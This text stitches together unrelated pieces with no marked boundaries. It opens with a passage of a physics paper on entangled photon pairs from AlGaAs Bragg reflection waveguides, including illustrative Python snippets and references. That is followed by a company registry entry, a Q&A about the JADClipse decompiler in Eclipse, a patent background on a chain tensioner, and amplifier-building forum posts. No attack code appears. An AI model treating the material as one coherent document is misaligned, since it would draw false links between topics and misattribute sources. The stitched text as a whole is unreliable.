the two sources are also schematically shown in Fig. \[Fig:structure\_SPDC\_SEM\](a). As such, in this approach, by varying the pump polarization and wavelength, one can select between both polarization entangled sources or use them concomitantly. The direct generation of both Bell states $(|H,H\rangle+|V,V\rangle)/\sqrt{2}$ and $(|H,V\rangle+|V,H\rangle)/\sqrt{2}$ on a single chip can be envisaged. In addition, by lithographically tuning the waveguide ridge width, one can tune the degree of entanglement of the first source.
Methods
=======
For concurrent type-0 and type-I processes with a shared TM polarized pump, paired photons can be either generated in TM polarizations via the type-0 process, or in TE polarizations via type-I process. In the ideal case, photon pairs can be produced from the two processes with the same efficiency and identical spectrum, which renders them in a maximally entangled state $(|H,H\rangle+\exp{i\phi}|V,V\rangle)/\sqrt{2}$. This is the approach which we shall pursue to obtain a chip-based entangled source using the type-0 and type-I interactions.
The AlGaAs structure used to demonstrate these sources was grown on a \[001\] GaAs substrate and the waveguide direction was oriented along \[110\]. Due to the zinc-blende crystal symmetry, the nonlinear tensor $\chi^{(2)}_{ijk}$ is non-zero only when $i\neq j\neq k$, with $i,j,k=x,y,z$ being the crystal coordinates. As a result, three SPDC processes, namely type-0, type-I, and type-II, could coexist provided PM is satisfied. Among them, the type-0 process depends on the electric field components of the interacting modes along the propagation direction, which are usually negligible in weakly guided waveguides. In BRWs, however, due to the index variations between different layers, the efficiency of the type-0 process can be significant and can even be markedly tuned by engineering the epitaxial structure [@Kang_OL_2012]. In order to achieve concurrent PM of the type-0 and type-I processes, the effective index of the pump $n_{\text{TM}}(2\omega)$ should be equal to those of the down-converted photons $n_{\text{TE}}(\omega)$ and $n_{\text{TM}}(\omega)$ simultaneously, i.e., $n_{\text{TM}}(2\omega)=n_{\text{TE}}(\omega)=n_{\text{TM}}(\omega)$, with $\omega$ indicating the degenerate PM frequency of the down-converted photons, and TE, TM indicating the polarizations. This requirement can be satisfied lithographically by tuning the ridge width.
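As a rough illustration of this lithographic tuning, the sketch below scans the ridge width for the point where the three effective indices coincide. The linear index models and every numerical value in them are invented for illustration only; real effective indices would come from a full vectorial mode solver for the BRW epitaxial structure.

```python
import numpy as np

# Toy effective-index models (purely illustrative assumptions, not solver
# output). Each index is taken to vary linearly with ridge width w (um)
# near w ~ 1.5 um, crossing at the concurrent-PM point.
def n_pump_TM(w):    # Bragg mode at 2*omega
    return 3.050 - 0.020 * (w - 1.5)

def n_signal_TE(w):  # TIR mode at omega
    return 3.050 + 0.012 * (w - 1.5)

def n_signal_TM(w):  # TIR mode at omega
    return 3.050 + 0.010 * (w - 1.5)

def pm_mismatch(w):
    """Largest pairwise effective-index mismatch among the three modes."""
    n = np.array([n_pump_TM(w), n_signal_TE(w), n_signal_TM(w)])
    return n.max() - n.min()

# Scan ridge widths in 20 nm steps, mirroring the lithographic step size.
widths = np.arange(1.40, 1.61, 0.02)
best = min(widths, key=pm_mismatch)
print(f"best ridge width: {best:.2f} um, mismatch: {pm_mismatch(best):.2e}")
```

In this toy model all three indices meet at $w=1.50$ $\mu$m, where the mismatch vanishes; in practice the crossing point is what the 20 nm lithographic sweep is designed to bracket.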
The two photon state generated via the two concurrent SPDC processes is given by [@Kang_PRA_2014; @Zhukovsky_JOSAB_2012] $$\begin{aligned}
\left|\psi\right\rangle=&\frac{1}{\sqrt{\eta_{\text{I}}+\eta_0}}\iint d\omega_1 d\omega_2[\sqrt{\eta_{\text{I}}}\Phi_{HH}(\omega_1,\omega_2)|H\omega_1,H\omega_2\rangle \nonumber\\
&+\sqrt{\eta_0}\Phi_{VV}(\omega_1,\omega_2)|V\omega_1,V\omega_2\rangle],
\label{Eq:state}\end{aligned}$$ where $\eta_{\text{I}}$, $\eta_{0}$ are the generation rates (pairs per pump photon) of the two processes after taking into account the losses. $\Phi_{HH}(\omega_1,\omega_2)$ and $\Phi_{VV}(\omega_1,\omega_2)$ are the biphoton wavefunctions, with the subscripts indicating the photon polarizations, and satisfy the normalization condition $\iint{d\omega_1 d\omega_2|\Phi_{HH(VV)}(\omega_1,\omega_2)|^2}=1$. When spatially separated, the paired photons are polarization entangled. The two spectra are found to be almost identical, as shown in Fig. \[Fig:spectra\](a). As a result, the state in Eq. (\[Eq:state\]) is maximally entangled when the generation rates are the same, i.e., $\eta_{\text{I}}=\eta_0$. In this case, there is no way, even in principle, to tell in which process a pair of photons is generated unless polarizations are measured. Therefore, polarization entangled photons can be generated inherently on the chip without the need for any extra component.
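For the idealized case of identical spectra, the dependence of the entanglement on the ratio $\eta_{\text{I}}/\eta_0$ can be checked numerically with the Wootters concurrence. The sketch below (our own illustration, not the analysis code used in the work) confirms the closed form $C=2\sqrt{\eta_{\text{I}}\eta_0}/(\eta_{\text{I}}+\eta_0)$ for the pure state of Eq. (\[Eq:state\]):

```python
import numpy as np

def concurrence(rho):
    """Wootters concurrence of a two-qubit density matrix."""
    sy = np.array([[0, -1j], [1j, 0]])
    flip = np.kron(sy, sy)
    rho_tilde = flip @ rho.conj() @ flip
    # Square roots of the eigenvalues of rho * rho_tilde, descending.
    lam = np.sort(np.sqrt(np.abs(np.linalg.eigvals(rho @ rho_tilde))))[::-1]
    return max(0.0, lam[0] - lam[1] - lam[2] - lam[3])

def copolarized_state(eta_I, eta_0, phi=0.0):
    """Density matrix of (sqrt(eta_I)|HH> + e^{i phi} sqrt(eta_0)|VV>),
    normalized, assuming identical spectra for the two processes.
    Basis order: HH, HV, VH, VV."""
    psi = np.zeros(4, dtype=complex)
    psi[0] = np.sqrt(eta_I)
    psi[3] = np.exp(1j * phi) * np.sqrt(eta_0)
    psi /= np.linalg.norm(psi)
    return np.outer(psi, psi.conj())

for ratio in [1.0, 2.0, 5.0]:
    C = concurrence(copolarized_state(ratio, 1.0))
    print(f"eta_I/eta_0 = {ratio}: C = {C:.3f}")
```

For $\eta_{\text{I}}=2\eta_0$ this gives $C=2\sqrt{2}/3\approx 0.943$ for the pure state, consistent with the value of 0.93 quoted later in the text once spectral effects are included.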
Polarization entanglement can also be produced by the type-II process on the same chip. Following the same formalism, the two-photon state of the type-II process can be explicitly written as $$\begin{aligned}
\left\vert\psi^{\prime}\right\rangle=&\frac{1}{\sqrt{2}}\iint{d\omega_{1}d\omega_{2}}[\Phi_{HV}(\omega_1,\omega_2)|H\omega_1,V\omega_2\rangle \nonumber\\
&+\Phi_{VH}(\omega_1,\omega_2)|V\omega_1,H\omega_2\rangle].
\label{Eq:state_type-II}\end{aligned}$$ For maximal entanglement, it requires $\Phi_{HV}(\omega_1,\omega_2)=\Phi_{VH}(\omega_1,\omega_2)$. This is not satisfied for the waveguide under test. However, due to the lack of material birefringence, and thus very small temporal walk-off, there exists a significant amount of overlap between $\Phi_{HV}(\omega_1,\omega_2)$ and $\Phi_{VH}(\omega_1,\omega_2)$. The corresponding spectra are shown in Fig. \[Fig:spectra\](b). As a result, entanglement exists even without any compensation and bandpass filtering.
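The role of the residual walk-off can be illustrated with a toy model: if $\Phi_{HV}$ and $\Phi_{VH}$ are taken as Gaussian temporal wavepackets whose centres are offset by the HV/VH walk-off, the polarization concurrence after tracing out the spectral degree of freedom is simply the magnitude of their overlap. The Gaussian shape and all parameters below are assumptions for illustration only:

```python
import numpy as np

def gaussian_amp(t, t0, sigma):
    """Normalized Gaussian temporal amplitude centred at t0."""
    return (2 * np.pi * sigma**2) ** (-0.25) * np.exp(-(t - t0) ** 2 / (4 * sigma**2))

def type2_concurrence(walkoff, sigma=1.0):
    """Polarization concurrence |<Phi_VH|Phi_HV>| for Gaussian wavepackets
    whose centres are offset by the HV/VH temporal walk-off (same units
    as sigma). Computed by numerical integration on a fine grid."""
    t = np.linspace(-20 * sigma, 20 * sigma, 4001)
    dt = t[1] - t[0]
    a = gaussian_amp(t, +walkoff / 2, sigma)
    b = gaussian_amp(t, -walkoff / 2, sigma)
    return float(abs(np.sum(a * b) * dt))

for tau in [0.0, 0.5, 2.0]:
    print(f"walk-off = {tau:.1f} sigma -> C = {type2_concurrence(tau):.3f}")
```

The overlap, and hence the concurrence, decays as $\exp[-\tau^2/(8\sigma^2)]$ with walk-off $\tau$ in this model, which is why the small modal birefringence of the BRW leaves substantial entanglement even without compensation.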
![(Color online) (a) The simulated spectral intensities of $H$ and $V$ polarized photons generated via the type-I and type-0 process, respectively; and (b) those of photons generated via the type-II process. The waveguide length is assumed to be 1.05 mm, the same as the waveguide tested in the experiment.[]{data-label="Fig:spectra"}](spectra_all_2){width="0.99\columnwidth"}
Photons in a pair need to be spatially separated. In this work, we used a 50:50 beamsplitter to separate photons non-deterministically followed by post-selection. However, paired photons can also be separated deterministically by a dichroic mirror or integrated dichroic splitter as was done in [@Horn_SR_2013]. For an ideal dichroic mirror which has a splitting wavelength at the degenerate point, the degree of entanglement is identical to that using a 50:50 beamsplitter.
Sample Description and Experimental Details
===========================================
As a proof of principle demonstration, a wafer designed for type-I PM around 1550 nm [@Abolghasem_OE_2010] is used to demonstrate this entangled photon source. Waveguides of this structure are lithographically tuned in order to satisfy concurrent PM of type-0 and type-I processes, with an etch depth of 6.5 $\mu$m and multiple ridge widths centered at 1.5 $\mu$m with a step size of 20 nm. An SEM image of a waveguide is shown in Fig. \[Fig:structure\_SPDC\_SEM\](b). Numerical simulations predict that concurrent PM of the two types can be achieved at a wavelength around 1.63 $\mu$m with a ridge width of $\sim$1.5 $\mu$m. Note that redesigning the epitaxial structure can shift the center wavelength to 1550 nm [@Kang_OL_2012]. The sample under test had a length of 1.05 mm.
In order to select the waveguide with the best alignment of its PM wavelengths, second harmonic generation (SHG) for both the type-0 and type-I processes was tested. The experiment was carried out on a standard end-fire coupling setup by pumping the waveguides with an optical parametric oscillator (OPO) pumped by a femtosecond pulsed Ti:Sapphire laser. The normalized SHG tuning curves of the waveguide under test are shown in Fig. \[Fig:PM wavelength\](a). According to Fig. \[Fig:PM wavelength\](a), the PM wavelengths of both types are near 1640 nm, the longest achievable wavelength of the OPO used. Due to the large bandwidth of the pump pulse, the exact PM wavelengths could not be accurately identified. SPDC was then carried out by pumping the waveguides with a CW Ti:Sapphire laser, where the dependence of the single photon count rate on the pump wavelength was measured. This allowed us to locate the waveguide with the best overlap in PM wavelengths among all tested waveguides. The results of the selected waveguide, shown in Fig. \[Fig:PM wavelength\](b), indicate that the PM wavelengths of both types are $816.7\pm0.3$ nm. The uncertainty in the PM wavelength measurement was due to the pump power fluctuation in the waveguide caused by Fabry–Pérot resonances, which could not be resolved with the instrumentation available.
To generate polarization entangled photons via the concurrent type-0 and type-I processes, the TM polarized pump beam from a CW Ti:Sapphire laser was coupled into the waveguide using a 100$\times$ (N.A.=0.90) objective lens, with a power of 1.13 mW before the lens. The photon pairs generated were collected by a 40$\times$ objective lens at the output facet and passed through long pass filters to eliminate the pump. After their separation using a 50:50 beamsplitter, the signal and idler photons were collected into multimode fibers and detected by two InGaAs single photon detectors. The signal arm detector (ID220, ID Quantique) operated in a free-running mode with 20% efficiency at 1550 nm. The idler detector (ID210, ID Quantique) operated in a gated mode with 25% efficiency at 1550 nm; it was externally triggered by the detection events of the first detector. An optical delay was added before the second detector to compensate for the electronic delay between the two detectors. Both detectors had a dead time of 20 $\mu$s. The coincidence counts were recorded with the help of time-to-digital converter (TDC) circuitry. At the degenerate wavelength of $\sim$1635 nm, the detection efficiencies are around 4% and 5%, respectively. A pair of quarter-wave plates (QWPs) and polarizers were used to measure the polarizations of the photon pairs. The schematic of the experimental setup is illustrated in Fig. \[Fig:setup\].
Considering the transmission coefficients of the output objective lens (90%), long pass filters (70%), beamsplitter (43%), QWPs and polarizers (75%) and fiber collection efficiencies in each path (53% and 34%), the overall collection efficiency of photon pairs with respect to the position right after the waveguide output facet was found to be $\sim$1.5%.
Results and Discussion
======================
Typical coincidence histograms are given in Fig. \[Fig:histograph\](a) for two $H$ polarized photons and Fig. \[Fig:histograph\](b) for two $V$ polarized photons, for a pump wavelength of 816.76 nm and an integration time of 3 minutes. The coincidence peaks indicate that photon pairs were generated via both the type-I and type-0 processes. The high level of accidental counts is due to detector dark counts and broken photon pairs caused by waveguide losses, as well as limited collection (1.5%) and detection (0.2%) efficiencies. By blocking the idler arm, we found that the dark counts of the second detector constitute 83% of the total accidental counts. Thus we can expect a much higher coincidence-to-accidental ratio (CAR) by redesigning the sample to generate photon pairs in a region where the detectors are more efficient (e.g., at 1550 nm).
![(Color online) Coincidence histograms of photon pairs in the (a) $HH$ and (b) $VV$ basis for an integration time of 3 minutes. The red bars around the peaks represent the counts in the coincidence window of $\sim$0.5 ns.[]{data-label="Fig:histograph"}](histograph){width="0.95\columnwidth"}
The net coincidence count rates for both the type-0 and type-I processes are around 0.7 Hz, after subtracting the accidental counts. Taking into account the signal arm detector’s dead time, single count rate (16 kHz), as well as the overall collection and detection efficiencies, we estimate the photon pair generation rates after the waveguide to be $3.4\times10^4$ pairs/s. The input objective lens has a transmission of 70% and the coupling efficiency into the pump Bragg mode is estimated to be 6%, resulting in an internal pump power of 47.3 $\mu$W right after the input facet. Therefore, the photon pair production rates are both around $7.3\times10^5$ pairs/s/mW with respect to the internal pump power and the photon pairs external to the waveguide, or equivalently, $1.8\times10^{-10}$ pairs/pump photon. The fact that both processes have roughly the same generation rates, as opposed to type-I being more efficient than type-0 as predicted by theoretical calculation, could be because the TM mode has a smaller loss than the TE mode in this type of deeply etched waveguide. We confirmed this by measuring the losses using the Fabry–Pérot method and found losses of 4.3 cm$^{-1}$ and 2.5 cm$^{-1}$ for the TE and TM modes, respectively. It could also be because the pump wavelength is slightly detuned from the degenerate PM wavelength of the more efficient process, as the two processes may not have exactly identical PM wavelengths.
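The estimate above can be roughly reproduced from the quoted numbers. The non-paralyzable dead-time correction used below is our own assumption, not necessarily the exact correction applied in the analysis, so the result lands within about 10% of the quoted $3.4\times10^4$ pairs/s:

```python
# Back-of-envelope reconstruction of the pair-rate estimate, using the
# rounded figures quoted in the text.
net_coincidences = 0.7      # Hz, accidental-subtracted coincidence rate
collection_eff   = 0.015    # overall pair collection efficiency
det_eff_signal   = 0.04     # signal detector efficiency near 1635 nm
det_eff_idler    = 0.05     # idler detector efficiency near 1635 nm
singles_rate     = 16e3     # Hz, signal-arm single count rate
dead_time        = 20e-6    # s, detector dead time

# Fraction of time the free-running signal detector is live
# (simple non-paralyzable dead-time model -- an assumption).
live_fraction = 1.0 / (1.0 + singles_rate * dead_time)

pairs_after_facet = net_coincidences / (
    collection_eff * det_eff_signal * det_eff_idler * live_fraction)
print(f"pairs after output facet: {pairs_after_facet:.2e} pairs/s")

# Normalizing by the estimated 47.3 uW internal pump power recovers the
# order of the quoted 7.3e5 pairs/s/mW production rate.
internal_pump_mw = 0.0473
print(f"rate: {pairs_after_facet / internal_pump_mw:.2e} pairs/s/mW")
```

The residual discrepancy reflects rounding of the inputs and the exact dead-time and heralding corrections used by the authors.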
Quantum state tomography measurements were then performed by projecting the paired photons onto 16 polarization combinations, and the density matrix was reconstructed using the maximum likelihood method [@James_PRA_2001; @note2]. The net density matrix $\rho$ of the output two-photon state, given in Fig. \[Fig:rho\], is found to have a concurrence [@Wootters_PRL_1998] of $0.85\pm 0.07$. The maximum fidelity with a maximally entangled state $|\Phi\rangle=(|H,H\rangle+\exp{(i\phi)}|V,V\rangle)/\sqrt{2}$, defined by $F=\max_{\phi}{\langle\Phi|\rho|\Phi\rangle}$, is 0.89 with a corresponding phase angle $\phi=40^{\circ}$. The non-zero phase $\phi$ arises from the slightly dissimilar degenerate PM wavelengths of the two processes. Theoretical calculation according to Eq. (\[Eq:state\]) shows that this phase value corresponds to the type-I PM wavelength being $\sim$0.02 nm shorter than that of the type-0 process. The imperfection of the entanglement could be mainly because the pump wavelength is not optimal, causing extra spectral distinguishability between the two processes. This can be improved by using a tunable diode laser with fine spectral tunability. In addition, mechanical drift of the characterization setup could result in an increase of mixture and a decrease of entanglement for measurements longer than a few minutes.
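The maximization over $\phi$ has a simple closed form: $F=(\rho_{HH,HH}+\rho_{VV,VV})/2+|\rho_{HH,VV}|$, attained at $\phi=-\arg(\rho_{HH,VV})$. A minimal sketch, applied to an illustrative density matrix (not the measured one):

```python
import numpy as np

def max_phi_fidelity(rho):
    """Fidelity of rho to (|HH> + e^{i phi}|VV>)/sqrt(2), maximized over
    phi. Basis order: HH, HV, VH, VV. Returns (F, optimal phi)."""
    F = 0.5 * (rho[0, 0].real + rho[3, 3].real) + abs(rho[0, 3])
    phi_opt = -np.angle(rho[0, 3])
    return F, phi_opt

# Illustrative example: an ideal phi = 40 deg state mixed with 10%
# white noise (our own assumption, for demonstration only).
phi = np.deg2rad(40)
psi = np.array([1, 0, 0, np.exp(1j * phi)]) / np.sqrt(2)
rho = 0.9 * np.outer(psi, psi.conj()) + 0.1 * np.eye(4) / 4

F, phi_opt = max_phi_fidelity(rho)
print(f"F = {F:.3f} at phi = {np.rad2deg(phi_opt):.1f} deg")
```

For this toy state the routine recovers $F=0.925$ at $\phi=40^{\circ}$, matching the injected phase; applied to a reconstructed $\rho$ it yields the fidelity and phase angle quoted above.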
![(Color online) (a) The tuning curves of the type-I (top) and type-0 (bottom) processes weighted by the corresponding efficiencies. The white dashed lines represent the pump wavelength, and (b) the corresponding spectra of the down-converted photons.[]{data-label="Fig:tuning_curves_and_spectra"}](tuning_curves_and_spectra_2){width="0.95\columnwidth"}
The fact that slightly different PM wavelengths cause one of the processes to take place below its maximal generation rate can be used to balance the generation rates of the two processes and therefore increase the degree of entanglement. Although engineering efforts can be made to achieve almost identical efficiencies, in reality there may still be differences, especially in the presence of polarization dependent losses. In such a case, the waveguide ridge width can be lithographically tuned such that the stronger process has a shorter PM wavelength, while the pump wavelength should be tuned to the degenerate PM wavelength of the weaker process.
To illustrate this point, we consider an example where the type-I process is twice as efficient as the type-0 process, i.e., $\eta_{\text{I}}=2\eta_{0}$. In the case where the two PM wavelengths are identical, the theoretical fidelity to a maximally entangled state is 0.96, and the concurrence is 0.93. The degree of entanglement can be increased to near maximum by tuning the ridge width such that the PM wavelength of the type-I process is 0.55 nm below that of the type-0 process. The corresponding tuning curves of the two processes weighted by their efficiencies are shown in Fig. \[Fig:tuning\_curves\_and\_spectra\](a). The pump wavelength, marked by the white line, is fixed at the degenerate PM wavelength of the type-0 process. In this case, the spectra, given in Fig. \[Fig:tuning\_curves\_and\_spectra\](b), show almost the same amplitude, indicating that the two processes have the same spectral brightness near the degenerate wavelength. By utilizing weak spectral filtering with a bandwidth of 80 nm, the calculated fidelity and concurrence increase to 0.997 and 0.995, respectively, with $\phi=34^{\circ}$, indicating the generation of maximally entangled photons. Without bandpass filtering, the maximum fidelity and concurrence can still reach 0.99 and 0.97, respectively, with a phase $\phi=14^{\circ}$, when the type-I PM wavelength is 0.36 nm below that of the type-0 process.
In addition, this tuning approach could be used to generate non-maximally entangled states $(|H,H\rangle+r\exp{(i\phi)}|V,V\rangle)/\sqrt{1+r^2}$ with a tunable value of $r$, which offers significant advantages over maximally entangled states in some applications such as closing the detection loophole in quantum nonlocality tests [@Christensen_PRL_2013].
Lastly, we show the generation of cross-polarized entangled photons on the same chip via the type-II process. For a TE polarized pump at 812.92 nm, less than 4 nm below the type-0 and type-I PM wavelengths, the output state, again without any compensation or bandpass filtering, shows a concurrence of $0.55\pm 0.08$ and a fidelity of 0.74 to the maximally entangled state $(|H,V\rangle+\exp{i\phi}|V,H\rangle)/\sqrt{2}$. The degree of entanglement is comparable with that obtained in [@Horn_SR_2013]. The reconstructed density matrix is given in Fig. \[Fig:rho\_type-II\]. The utility of this device becomes most apparent when one considers its capability to have all three types of PM simultaneously achieved at the same wavelength via tuning of the epitaxial structure combined with ridge width control [@Zhukovsky_OC_2013]. The unique ability to achieve this monolithically allows the generation of both co-polarized and cross-polarized entangled photons on the same chip at the same pump wavelength, by simply selecting the pump polarization. Even without such tuning, a few nanometres' difference in PM wavelength can be covered by a femtosecond pump laser.
Conclusion
==========
In conclusion, we have demonstrated how the waveguiding physics associated with BRWs can be used to simultaneously produce two polarization entangled photon sources using alternative approaches in a single self-contained, room-temperature semiconductor chip. Direct generation of polarization entangled photons from a monolithic compound semiconductor chip via concurrent type-0 and type-I SPDC processes has been characterized. Simultaneous PM of the two processes was achieved using simple lithographic control of the ridge width of BRWs. Without the need for off-chip compensation, interferometry, or bandpass filtering, the degree of entanglement is among the highest in previous demonstrations from monolithic III-V and Si chips. In addition, the same device can also directly generate polarization entanglement via the type-II process, with a pump wavelength only 4 nm shorter.
Further improving the device performance relies largely on improved fabrication. By reducing the waveguide losses, the generation rates can potentially be increased by more than two orders of magnitude, as predicted in [@Zhukovsky_JOSAB_2012] for lossless waveguides. In addition, the degree of entanglement can be increased by fine-tuning the ridge width via more precise fabrication, as we have shown that the entanglement can be nearly maximal in the ideal case [@Kang_OL_2012]. It can also be easily increased by bandpass filtering [@note].
Note that previous work on ferroelectric waveguides also exploited the diversity of multiple PM processes to generate quantum states with particular properties, such as using two quasi-phase matching (QPM) gratings to generate polarization entangled photons [@Herrmann_OE_2013; @Gong_PRA_2011] and using different spatial modes to achieve mode entanglement [@Mosley_PRL_2009]. While these results are fundamentally important, realizing such effects in a monolithic fashion, especially on III-V semiconductor platforms as in this work, ushers in a new era of practical optical quantum information processing.
Acknowledgements {#acknowledgements .unnumbered}
================
The authors would like to acknowledge R. Marchildon, G. Egorov, F. Xu, E. Zhu, and Z. Tang for helpful discussions. This work was supported by Natural Sciences and Engineering Research Council of Canada (NSERC).
[99]{} T. D. Ladd, F. Jelezko, R. Laflamme, Y. Nakamura, C. Monroe, and J. L. O’Brien, Nature **464**, 45 (2010).
N. Gisin, G. Ribordy, W. Tittel, and H. Zbinden, Rev. Mod. Phys. **74**, 145 (2002).
A. Christ, A. Fedrizzi, H. Hübel, T. Jennewein, and C. Silberhorn, Exper. Methods Phys. Sci. **45**, 351 (2013).
J. L. O’Brien, A. Furusawa, and J. Vučković, Nature Photon. **3**, 687 (2009).
A. Gaggero, S. Jahanmiri Nejad, F. Marsili, F. Mattioli, R. Leoni, D. Bitauld, D. Sahin, G. J. Hamhuis, R. Nötzel, R. Sanjines, and A. Fiore, Appl. Phys. Lett. **97**, 151108 (2010).
J. W. Silverstone, D. Bonneau, K. Ohira, N. Suzuki, H. Yoshida, N. Iizuka, M. Ezaki, C. M. Natarajan, M. G. Tanner, R. H. Hadfield, V. Zwiller, G. D. Marshall, J. G. Rarity, J. L. O’Brien, and M. G. Thompson, Nature Photon. **8**, 104 (2014).
H. Jin, F. M. Liu, P. Xu, J. L. Xia, M. L. Zhong, Y. Yuan, J. W. Zhou, Y. X. Gong, W. Wang, and S. N. Zhu, Phys. Rev. Lett. **113**, 103601 (2014).
T. Suhara, Laser Photon. Rev. **3**, 370 (2009).
S. V. Zhukovsky, D. Kang, P. Abolghasem, L. G. Helt, J. E. Sipe, and A. S. Helmy, Opt. Lett. **36**, 3548 (2011).
D. Kang, L. G. Helt, S. V. Zhukovsky, J. P. Torres, J. E. Sipe, and A. S. Helmy, Phys. Rev. A **89**, 023833 (2014).
P. Abolghasem, M. Hendrych, X. Shi, J. P. Torres, and A. S. Helmy, Opt. Lett. **34**, 2000 (2009).
A. Valencia, G. Scarcelli, and Y. H. Shih, Appl. Phys. Lett. **85**, 2655 (2004).
S. Lloyd, Science [**321**]{}, 1463 (2008).
S. Sauge, M. Swillo, S. Alber-Seifried, G. B. Xavier, J. Waldeback, M. Tengner, D. Ljunggren and A. Karlsson, Opt. Express **15**, 6926 (2007).
F. Kaiser, A. Issautier, L. A. Ngah, O. Dănilă, H. Herrmann, W. Sohler, A. Martin, and S. Tanzilli, New J. Phys. **14**, 085015 (2012).
S. Arahira and H. Murai, Opt. Express **21**, 7841 (2013).
N. Matsuda, H. L. Jeannic, H. Fukuda, T. Tsuchizawa, W. J. Munro, K. Shimizu, K. Yamada, Y. Tokura, and H. Takesue, Sci. Rep. **2**, 817 (2012).
L. Olislager, J. Safioui, S. Clemmen, K. P. Huy, W. Bogaerts, R. Baets, P. Emplit, and S. Massar, Opt. Lett. **38**, 1960 (2013).
A. Orieux, A. Eckstein, A. Lemaître, P. Filloux, I. Favero, G. Leo, T. Coudreau, A. Keller, P. Milman, and S. Ducci, Phys. Rev. Lett. **110**, 160502 (2013).
R. T. Horn, P. Kolenderski, D. Kang, P Abolghasem, C. Scarcella, A. D. Frera, A. Tosi, L. G. Helt, S. V. Zhukovsky, J. E. Sipe, G. Weihs, A. S. Helmy, and T. Jennewein, Sci. Rep. **3**, 2314 (2013).
B. J. Bijlani, P. Abolghasem, and A. S. Helmy, Appl. Phys. Lett. **103**, 091103 (2013).
F. Boitier, A. Orieux, C. Autebert, A. Lemaitre, E. Galopin, C. Manquest, C. Sirtori, I. Favero, G. Leo, and S. Ducci, Phys. Rev. Lett. **112**, 183901 (2014).
D. Kang and A. S. Helmy, Opt. Lett., **37**, 1481 (2012).
S. V. Zhukovsky, L. G. Helt, P. Abolghasem, D. Kang, J. E. Sipe, and A. S. Helmy, J. Opt. Soc. Am. B **29**, 2516 (2012).
P. Abolghasem, J. B. Han, B. J. Bijlani, and A. S. Helmy, Opt. Express **18**, 12861 (2010).
D. F. V. James, P. G. Kwiat, W. J. Munro, and A. G. White, Phys. Rev. A **64**, 052312 (2001).
The density matrix reconstruction was performed using the program provided on [P. Kwiat group’s website](http://webusers.physics.illinois.edu/~tomowww/TomographyDemo.php).
W. K. Wootters, Phys. Rev. Lett. **80**, 2245 (1998).
B. G. Christensen, K. T. McCusker, J. B. Altepeter, B. Calkins, T. Gerrits, A. E. Lita, A. Miller, L. K. Shalm, Y. Zhang, S. W. Nam, N. Brunner, C. C. W. Lim, N. Gisin, and P. G. Kwiat, Phys. Rev. Lett. **111**, 130406 (2013).
S. V. Zhukovsky, L.G. Helt, D. Kang, P. Abolghasem, A. S. Helmy, and J. E. Sipe, Opt. Comm. **301-302**, 127 (2013).
In a separate experiment, we have demonstrated a concurrence of 0.98 via the type-II process in a similar waveguide with bandpass filtering only. The results will be published elsewhere.
H. Herrmann, X. Yang, A. Thomas, A. Poppe, W. Sohler, and C. Silberhorn, Opt. Express **21**, 27981 (2013).
Y. X. Gong, Z. D. Xie, P. Xu, X. Q. Yu, P. Xue, and S. N. Zhu, Phys. Rev. A **84**, 053825 (2011).
P. J. Mosley, A. Christ, A. Eckstein, and C. Silberhorn, Phys. Rev. Lett. **103**, 233901 (2009).
Description
ANCO CONSULTANTS LIMITED has been operating since 3/29/2016. The current status of the business is Active. ANCO CONSULTANTS LIMITED is located at UNIT 3D DREADNOUGHT TRADING ESTATE, MAGDALEN LANE, BRIDPORT, DORSET, ENGLAND, DT6 5BU. Anne Marie Crowe is known as a Director of the company. Colin William Mcreavie is known as a Director of the company.
Q:
JADClipse not working with Eclipse 3.6
Does Jadclipse work on Eclipse 3.6?
I have installed JADClipse 3.3.0 on my Eclipse 3.6 by copying the jar into the plugins directory and restarting Eclipse.
Now I have the JADClipse menu under Window -> Preferences, but when I try to decompile any class it simply does not decompile. I get the usual Eclipse screen saying the source is unavailable. There are no errors in the Error Log.
Any idea?
A:
I eventually found the answer here.
Running eclipse with -clean switch and setting the file association between *.class and the jadclipse plug-in solved the problem.
A:
Set the JAD path correctly in Preferences > Java > Jad. Ex: D:\Jad\jad.exe
If still not working then,
Go to File Associations in Preferences. Select JadClipse as the default editor for .class and .class without source.
A:
The main reason is that your Eclipse has a default class viewer configured for class files, which you have to change to your new class decompiler.
Go to Preferences > Editors, choose "class without source", select your tool, and mark it as default. It will work for you :)
The present invention relates to a tensioner adapted for adjusting tensile force of a chain or a toothed belt, and more particularly pertains to a tensioner hermetically containing oil, wherein the oil hermetic type tensioner provides a preventive structure which prevents a diaphragm covering an oil reservoir from extraordinarily deforming.
FIG. 5 shows a conventional oil hermetic type tensioner 50 as disclosed in Japanese Utility Model Application Laid-open No. Hei 1-121755. A piston 54 divides an inside of a cylinder 52 into a high-pressure chamber 56 and a low-pressure chamber 58. The total volume of the high-pressure chamber 56 and the low-pressure chamber 58 changes depending on the slidably reciprocal movement of the piston 54. The oil reservoir 62 can absorb any change of the total volume of the high-pressure chamber 56 and the low-pressure chamber 58.
The foregoing oil hermetic type tensioner 50 includes a diaphragm 60 and a pressurizing means 64 on the atmosphere side of diaphragm 60. The pressurizing means 64 is made up of a combination of a compression spring 65 and a spring seat 66, or of a sponge. When the piston 54 moves frontward (in a right direction as viewed in FIG. 5), oil from the oil reservoir 62 and the low-pressure chamber 58 flows through the passages 68, 70 and valve 72 into the high-pressure-chamber 56, reducing the air pressure in pressurizing means 64 and the oil volume in reservoir 62 and low-pressure chamber 58. The pressurizing means 64 prevents the low-pressure chamber 58 from becoming negative pressure and assures smooth flow of oil.
However, the diaphragm 60 is not restricted by the pressurizing means 64. Because the tensioner 50 is used where there are a lot of vibrations, either the diaphragm 60 or the pressurizing means 64 repeats free movement. Such free movement may cause an extraordinary deformation in diaphragm 60 which is normally biased by the pressurizing means 64.
Free movement between the diaphragm 60 and the pressurizing means 64 may cause the diaphragm 60 to wear away. Further, extraordinary deformation may cause the diaphragm 60 itself to apply a partial force. Consequently, the durability of the diaphragm 60 would decline and, if worst comes to worst, oil could leak out of the diaphragm 60, so that the tensioner 50 could not properly perform its intended function.
yeah, i spent a few hours sorting out the parts, short a couple, over a few. got amp 2 started. i have a plan. a module plan. production type assembly so all will be identical in the end. amps 3, 4, 5, 6 and 7 will be next for the first set of parts. i will probably leave the first one as is.
Yes sir! I didn't like the look of the double L layout... At first I wanted to place my serial number plate in between the tubes, but it was just a little too big... My father waited until the VERY last minute to change his chassis too, he liked my layout better than the original. The only MAJOR problem I had with mirroring the channel was that the feedback loop leads had to be reversed on side that was mirrored, I didn't make that mistake on Wayne's!
RIP BillD
BillD wrote:Well, some people are glass half empty people and some are glass half full. Being an engineer, I just think the glass is the wrong size.
